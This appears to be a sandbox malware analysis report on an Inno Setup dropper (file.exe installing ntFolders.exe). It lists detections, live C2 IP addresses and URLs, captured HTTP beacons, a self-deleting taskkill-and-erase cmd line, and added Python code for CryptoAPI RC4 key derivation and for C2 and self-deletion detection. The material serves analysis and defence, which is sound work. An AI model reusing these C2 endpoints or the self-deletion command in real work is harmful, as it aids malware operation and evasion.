Source: 0.0.file.exe.400000.0.unpack |
Avira: Label: TR/Crypt.XPACK.Gen2 |
Source: 0.3.file.exe.2118000.4.unpack |
Avira: Label: TR/Patched.Ren.Gen |
Source: 0.2.file.exe.400000.0.unpack |
Avira: Label: TR/Crypt.XPACK.Gen2 |
Source: 2.2.ntFolders.exe.10000000.6.unpack |
Avira: Label: TR/Crypt.XPACK.Gen8 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_10001000 ISCryptGetVersion, |
1_2_10001000 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_10001130 ArcFourCrypt, |
1_2_10001130 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_00403770 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,___std_exception_copy, |
2_2_00403770 |
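The call chain above (CryptAcquireContextW, CryptCreateHash, CryptHashData, CryptDeriveKey, CryptDecrypt) is the classic CryptoAPI password-to-key pattern, and an analyst who wants to decrypt the same blob outside the sandbox has to reproduce CryptDeriveKey's derivation exactly. The block below is an added example, not code from the report or from the sample: it implements both CryptDeriveKey branches as Microsoft documents them (plain hash truncation for stream ciphers, the 0x36/0x5C expansion for 3DES/AES, and the 40-bit zero-padded RC4 key of the Base CSP) plus RC4 to stand in for CryptDecrypt. The hash and cipher ALG_IDs, the password and the ciphertext used by ntFolders.exe are not visible in the report, so the sample password and plaintext are constructed. The ISCryptGetVersion/ArcFourCrypt pair listed for is-I19BM.tmp is the Inno Setup installer's own ISCrypt.dll (dropped as _iscrypt.dll) and is unrelated to this routine.

```python
import hashlib

# Added analysis helper: offline re-implementation of the CryptoAPI chain seen in
# ntFolders.exe at 2_2_00403770 (CryptHashData -> CryptDeriveKey -> CryptDecrypt).
# The ALG_IDs, password and ciphertext are NOT in the report; values below are constructed.


def crypt_derive_key(hash_name, secret, key_len, block_cipher=False, base_csp=False):
    """Reproduce CryptDeriveKey() for an MD5/SHA-1 base hash.

    hash_name    -- 'md5' or 'sha1', the ALG_ID handed to CryptCreateHash
    secret       -- the bytes passed to CryptHashData
    key_len      -- derived key length in bytes implied by the cipher ALG_ID/dwFlags
    block_cipher -- True for CALG_3DES/CALG_AES_*: CAPI then uses the 0x36/0x5C expansion
    base_csp     -- True for the Microsoft Base Cryptographic Provider, whose RC4 keys are
                    40-bit: 5 hash bytes followed by 11 zero bytes (no salt)
    """
    digest = hashlib.new(hash_name, secret).digest()
    if block_cipher:
        # 3DES/AES with a non-SHA-2 hash: XOR the hash into 64-byte 0x36 and 0x5C pads,
        # hash each pad, concatenate, keep the leading key_len bytes.
        k = len(digest)
        ipad = bytes((0x36 ^ digest[i]) if i < k else 0x36 for i in range(64))
        opad = bytes((0x5C ^ digest[i]) if i < k else 0x5C for i in range(64))
        expanded = hashlib.new(hash_name, ipad).digest() + hashlib.new(hash_name, opad).digest()
        if key_len > len(expanded):
            raise ValueError("requested key longer than the expanded hash")
        return expanded[:key_len]
    if base_csp:
        # Base CSP RC4: effective 40-bit key, zero-padded to 16 bytes.
        return digest[:5] + b"\x00" * 11
    if key_len > len(digest):
        raise ValueError("stream-cipher key cannot exceed the hash length")
    # RC2/RC4 and similar: the key is simply the truncated hash value.
    return digest[:key_len]


def rc4(key, data):
    """Plain RC4 (CALG_RC4); encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def capi_rc4_decrypt(password, ciphertext, hash_name="md5", base_csp=False):
    """Mirror CryptHashData(password) -> CryptDeriveKey(CALG_RC4) -> CryptDecrypt."""
    key = crypt_derive_key(hash_name, password, 16, block_cipher=False, base_csp=base_csp)
    return rc4(key, ciphertext)


# Constructed sample (assumption, not from the report): encrypt a fake config string the way
# the sample's CryptEncrypt counterpart would, then recover it with the same derivation.
SAMPLE_PASSWORD = b"example-password"
SAMPLE_PLAINTEXT = b"constructed config blob"
SAMPLE_CIPHERTEXT = capi_rc4_decrypt(SAMPLE_PASSWORD, SAMPLE_PLAINTEXT)  # RC4 is symmetric


if __name__ == "__main__":
    print(capi_rc4_decrypt(SAMPLE_PASSWORD, SAMPLE_CIPHERTEXT))
```

When the decrypted output is garbage, the first things to vary are the provider (Base vs Enhanced CSP changes the RC4 key size) and whether CryptHashData was fed an ANSI or a UTF-16 string; the `_mbstowcs` call sitting between CryptCreateHash and CryptHashData in the listing above suggests the wide form.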
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_0046C770 FindFirstFileA,FindNextFileA,FindClose, |
1_2_0046C770 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00474708 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose, |
1_2_00474708 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00451554 FindFirstFileA,GetLastError, |
1_2_00451554 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_0048A778 FindFirstFileA,6D7069D0,FindNextFileA,FindClose, |
1_2_0048A778 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_004729D4 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose, |
1_2_004729D4 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_0045CA54 FindFirstFileA,FindNextFileA,FindClose, |
1_2_0045CA54 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00406FEC FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, |
1_2_00406FEC |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_0045DB60 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, |
1_2_0045DB60 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_0045DEF4 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, |
1_2_0045DEF4 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer, |
2_2_00404490 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_00423E2D FindFirstFileExW, |
2_2_00423E2D |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_1000959D FindFirstFileExW, |
2_2_1000959D |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.139.105.171 (4 connections) |
Source: unknown |
TCP traffic detected without corresponding DNS query: 107.182.129.235 (46 connections) |
Source: ntFolders.exe, 00000002.00000002.394014970.0000000001844000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://107.182.129.235/storage/extension.php |
Source: ntFolders.exe, 00000002.00000002.394014970.0000000001844000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://107.182.129.235/storage/ping.php |
Source: ntFolders.exe, 00000002.00000002.394014970.0000000001844000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://171.22.30.106/library.php |
Source: ntFolders.exe, 00000002.00000002.394014970.0000000001844000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://171.22.30.106/library.phpH |
Source: ntFolders.exe, 00000002.00000002.394014970.0000000001844000.00000004.00000020.00020000.00000000.sdmp, ntFolders.exe, 00000002.00000002.394139951.000000000187A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte |
Source: file.exe |
String found in binary or memory: http://www.innosetup.com |
Source: is-I19BM.tmp, is-I19BM.tmp, 00000001.00000000.306831625.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-I19BM.tmp.0.dr, is-K96P8.tmp.1.dr |
String found in binary or memory: http://www.innosetup.com/ |
Source: file.exe, 00000000.00000003.306222785.0000000002200000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.306408655.0000000002118000.00000004.00001000.00020000.00000000.sdmp, is-I19BM.tmp, 00000001.00000002.395161258.00000000004BC000.00000002.00000001.01000000.00000004.sdmp, is-I19BM.tmp.0.dr, is-K96P8.tmp.1.dr |
String found in binary or memory: http://www.innosetup.comDVarFileInfo$ |
Source: file.exe, 00000000.00000003.306222785.0000000002200000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.306408655.0000000002118000.00000004.00001000.00020000.00000000.sdmp, is-I19BM.tmp, is-I19BM.tmp, 00000001.00000000.306831625.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-I19BM.tmp.0.dr, is-K96P8.tmp.1.dr |
String found in binary or memory: http://www.remobjects.com/?ps |
Source: file.exe, 00000000.00000003.306222785.0000000002200000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.306408655.0000000002118000.00000004.00001000.00020000.00000000.sdmp, is-I19BM.tmp, 00000001.00000000.306831625.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-I19BM.tmp.0.dr, is-K96P8.tmp.1.dr |
String found in binary or memory: http://www.remobjects.com/?psU |
Source: global traffic |
HTTP traffic detected: GET /itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 1
Host: 45.139.105.171
Connection: Keep-Alive
Cache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /storage/ping.php HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 0
Host: 107.182.129.235
Connection: Keep-Alive
Cache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /storage/extension.php HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 1
Host: 107.182.129.235
Connection: Keep-Alive
Cache-Control: no-cache |
Source: global traffic |
HTTP traffic detected (11 identical requests): GET /library.php HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 2
Host: 171.22.30.106
Connection: Keep-Alive
Cache-Control: no-cache |
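The requests above share three traits that are easy to hunt for in proxy or Zeek-style telemetry: the destination IP was never returned by any DNS answer during the run (the sandbox's "TCP traffic without corresponding DNS query" signature), the Host header is a bare IP literal, and the User-Agent is a single digit (0, 1 or 2) that no real client sends. The block below is an added detection example, not part of the report; the DNS and HTTP records are constructed from the values in the report plus one benign browser request as a control, and the field layout is an assumption rather than any particular sensor's schema.

```python
import ipaddress
import re

# Added detection example over constructed records (not exported from the sandbox).
# DNS_ANSWERS: (queried name, answered IP). HTTP_REQUESTS: (dst_ip, Host, User-Agent, request line).

DNS_ANSWERS = [
    ("example.com", "93.184.216.34"),   # constructed: the only name resolved in this run
]

HTTP_REQUESTS = [
    ("45.139.105.171", "45.139.105.171", "1",
     "GET /itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte HTTP/1.1"),
    ("107.182.129.235", "107.182.129.235", "0", "GET /storage/ping.php HTTP/1.1"),
    ("107.182.129.235", "107.182.129.235", "1", "GET /storage/extension.php HTTP/1.1"),
    ("171.22.30.106", "171.22.30.106", "2", "GET /library.php HTTP/1.1"),
    # benign control: a browser fetching a name that DNS actually resolved
    ("93.184.216.34", "example.com",
     "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", "GET / HTTP/1.1"),
]

BROWSER_UA = re.compile(r"^(Mozilla|Opera|curl|Wget|python-requests)/\d", re.I)


def is_ip_literal(host):
    """True when the Host header is a bare IP (IPv4 optionally with :port, or IPv6)."""
    if host.count(":") == 1:          # IPv4:port
        host = host.split(":")[0]
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def suspicious_user_agent(ua):
    """Flag User-Agent values no real client sends: empty, all digits, or very short."""
    ua = ua.strip()
    return not ua or ua.isdigit() or (len(ua) < 8 and not BROWSER_UA.match(ua))


def find_c2_candidates(dns_answers, http_requests):
    """One finding per request whose destination IP never appeared in a DNS answer,
    with the weaker corroborating signals (IP-literal Host, odd User-Agent) attached."""
    resolved = {ip for _, ip in dns_answers}
    findings = []
    for dst_ip, host, ua, request_line in http_requests:
        reasons = []
        if dst_ip not in resolved:
            reasons.append("no-dns-answer")
        if is_ip_literal(host):
            reasons.append("ip-literal-host")
        if suspicious_user_agent(ua):
            reasons.append("anomalous-user-agent")
        # Missing DNS is the gating condition; the other two only raise confidence.
        if "no-dns-answer" in reasons:
            findings.append({"dst_ip": dst_ip, "request": request_line, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_c2_candidates(DNS_ANSWERS, HTTP_REQUESTS):
        print(f["dst_ip"], f["reasons"], f["request"])
```

In production the DNS set should be built from the full resolver log of the host (or the proxy's own resolutions), since a legitimate CDN connection can also be made to an IP cached before the capture window started; the IP-literal Host and digit-only User-Agent checks are what separate these requests from that noise.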
Source: Yara match |
File source: 2.2.ntFolders.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.2.ntFolders.exe.3160000.4.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.2.ntFolders.exe.3160000.4.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.2.ntFolders.exe.400000.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000002.00000002.393868626.0000000001740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000002.393249857.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000002.394218193.0000000003160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_004081C8 |
0_2_004081C8 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00468940 |
1_2_00468940 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00460F30 |
1_2_00460F30 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_0043DF70 |
1_2_0043DF70 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_004303A4 |
1_2_004303A4 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_0047A6D8 |
1_2_0047A6D8 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_004446E8 |
1_2_004446E8 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00434994 |
1_2_00434994 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_0045AA90 |
1_2_0045AA90 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00480BDC |
1_2_00480BDC |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00444C90 |
1_2_00444C90 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00462F38 |
1_2_00462F38 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00445388 |
1_2_00445388 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00435698 |
1_2_00435698 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00445794 |
1_2_00445794 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_0042F948 |
1_2_0042F948 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00457BB4 |
1_2_00457BB4 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_00404490 |
2_2_00404490 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_004096F0 |
2_2_004096F0 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_004056A0 |
2_2_004056A0 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_00406800 |
2_2_00406800 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_00406AA0 |
2_2_00406AA0 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_00404D40 |
2_2_00404D40 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_00405F40 |
2_2_00405F40 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_00402F20 |
2_2_00402F20 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_004150D3 |
2_2_004150D3 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_00415305 |
2_2_00415305 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_004223A9 |
2_2_004223A9 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_00419510 |
2_2_00419510 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_00404840 |
2_2_00404840 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_00426850 |
2_2_00426850 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_00410A50 |
2_2_00410A50 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_0042AB9A |
2_2_0042AB9A |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_00421C88 |
2_2_00421C88 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_0042ACBA |
2_2_0042ACBA |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_00447D2D |
2_2_00447D2D |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_00428D39 |
2_2_00428D39 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_00404F20 |
2_2_00404F20 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_1000F670 |
2_2_1000F670 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_1000EC61 |
2_2_1000EC61 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: String function: 004035DC appears 90 times |
|
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: String function: 00403548 appears 61 times |
|
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: String function: 00407B08 appears 33 times |
|
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: String function: 00445FF4 appears 43 times |
|
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: String function: 00455A04 appears 49 times |
|
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: String function: 004037CC appears 193 times |
|
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: String function: 00405AA4 appears 92 times |
|
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: String function: 00455814 appears 86 times |
|
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: String function: 004462C4 appears 58 times |
|
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: String function: 004348AC appears 32 times |
|
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: String function: 00451AFC appears 62 times |
|
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: String function: 00408DF0 appears 42 times |
|
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: String function: 10003C50 appears 34 times |
|
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: String function: 0040F9E0 appears 54 times |
|
Source: is-I19BM.tmp.0.dr |
Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows |
Source: is-I19BM.tmp.0.dr |
Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows |
Source: is-I19BM.tmp.0.dr |
Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows |
Source: is-K96P8.tmp.1.dr |
Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows |
Source: is-K96P8.tmp.1.dr |
Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows |
Source: is-K96P8.tmp.1.dr |
Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows |
Source: file.exe, 00000000.00000003.306222785.0000000002200000.00000004.00001000.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe |
Source: file.exe, 00000000.00000003.306222785.0000000002200000.00000004.00001000.00020000.00000000.sdmp |
Binary or memory string: OriginalFilename6 vs file.exe |
Source: file.exe, 00000000.00000000.305692501.0000000000410000.00000002.00000001.01000000.00000003.sdmp |
Binary or memory string: OriginalFilename" vs file.exe |
Source: file.exe, 00000000.00000003.306408655.0000000002118000.00000004.00001000.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe |
Source: file.exe, 00000000.00000003.306408655.0000000002118000.00000004.00001000.00020000.00000000.sdmp |
Binary or memory string: OriginalFilename6 vs file.exe |
Source: file.exe |
Binary or memory string: OriginalFilename" vs file.exe |
Source: unknown |
Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe |
|
Source: C:\Users\user\Desktop\file.exe |
Process created: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp "C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp" /SL4 $30366 "C:\Users\user\Desktop\file.exe" 2214542 96256 |
|
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Process created: C:\Program Files (x86)\PrintFolders\ntFolders.exe "C:\Program Files (x86)\PrintFolders\ntFolders.exe" |
|
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Process created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\karcA17.exe |
|
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "ntFolders.exe" /f & erase "C:\Program Files (x86)\PrintFolders\ntFolders.exe" & exit |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "ntFolders.exe" /f |
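Two entries in the process list above are worth turning into detections: ntFolders.exe dropping and launching karcA17.exe from a GUID-named directory under %APPDATA%\Roaming, and ntFolders.exe spawning cmd.exe with a command line that kills and then erases its own parent (the classic self-deletion one-liner). The block below is an added example, not part of the report: it runs two rules over constructed Sysmon Event ID 1 style records that mirror the report's process tree, plus a benign cmd.exe launch as a control. The field names follow Sysmon; the events themselves are constructed.

```python
import ntpath
import re

# Added detection example over constructed Sysmon-style process-creation events that
# reproduce the report's process tree; the records are constructed, not exported from the sandbox.

EVENTS = [
    {"ParentImage": r"C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp",
     "Image": r"C:\Program Files (x86)\PrintFolders\ntFolders.exe",
     "CommandLine": r'"C:\Program Files (x86)\PrintFolders\ntFolders.exe"'},
    {"ParentImage": r"C:\Program Files (x86)\PrintFolders\ntFolders.exe",
     "Image": r"C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\karcA17.exe",
     "CommandLine": r"C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\karcA17.exe"},
    {"ParentImage": r"C:\Program Files (x86)\PrintFolders\ntFolders.exe",
     "Image": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": r'"C:\Windows\System32\cmd.exe" /c taskkill /im "ntFolders.exe" /f & erase "C:\Program Files (x86)\PrintFolders\ntFolders.exe" & exit'},
    # benign control: a user running a directory listing from Explorer
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'"C:\Windows\System32\cmd.exe" /c dir C:\Temp'},
]

# %APPDATA%\Roaming\{GUID}\ as a drop location (the karcA17.exe path in the report)
GUID_DIR = re.compile(r"\\AppData\\Roaming\\\{[0-9a-f-]{36}\}\\", re.I)
# taskkill [/f] /im <image> with or without quotes
TASKKILL = re.compile(r'taskkill\s+(?:/f\s+)?/im\s+"?([^"\s]+)"?', re.I)
# erase|del <path> followed by & or end of line
DELETE = re.compile(r'\b(?:erase|del)\s+"?([^"&]+?)"?\s*(?:&|$)', re.I)


def parent_self_delete(event):
    """cmd.exe launched by a process whose command line then kills and deletes that parent."""
    if ntpath.basename(event["Image"]).lower() != "cmd.exe":
        return False
    cmd = event["CommandLine"]
    parent = event["ParentImage"]
    kill = TASKKILL.search(cmd)
    delete = DELETE.search(cmd)
    kills_parent = kill is not None and kill.group(1).lower() == ntpath.basename(parent).lower()
    deletes_parent = delete is not None and delete.group(1).strip().lower() == parent.lower()
    return kills_parent and deletes_parent


def dropped_into_guid_dir(event):
    """Executable started from %APPDATA%\\Roaming\\{GUID}\\, the drop path seen in the report."""
    return GUID_DIR.search(event["Image"]) is not None


def triage(events):
    """Return (event index, rule name) for every event that matches a rule."""
    hits = []
    for idx, ev in enumerate(events):
        if parent_self_delete(ev):
            hits.append((idx, "self-delete-via-cmd"))
        if dropped_into_guid_dir(ev):
            hits.append((idx, "exec-from-appdata-guid-dir"))
    return hits


if __name__ == "__main__":
    for idx, rule in triage(EVENTS):
        print(rule, "->", EVENTS[idx]["Image"])
```

The self-delete rule deliberately requires both the taskkill target and the erase target to resolve to the parent image; matching on `taskkill` or `del` alone fires on uninstallers and build scripts, which is why the report's cmd.exe command line, with both halves present, is the useful signature.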
|
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_00408F74 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,6DB74E70, |
0_2_00408F74 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00453A8C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,6DB74E70, |
1_2_00453A8C |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_00406584 push 004065C1h; ret |
0_2_004065B9 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_00404159 push eax; ret |
0_2_00404195 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_00404229 push 00404435h; ret |
0_2_0040442D |
Source: C:\Users\user\Desktop\file.exe |
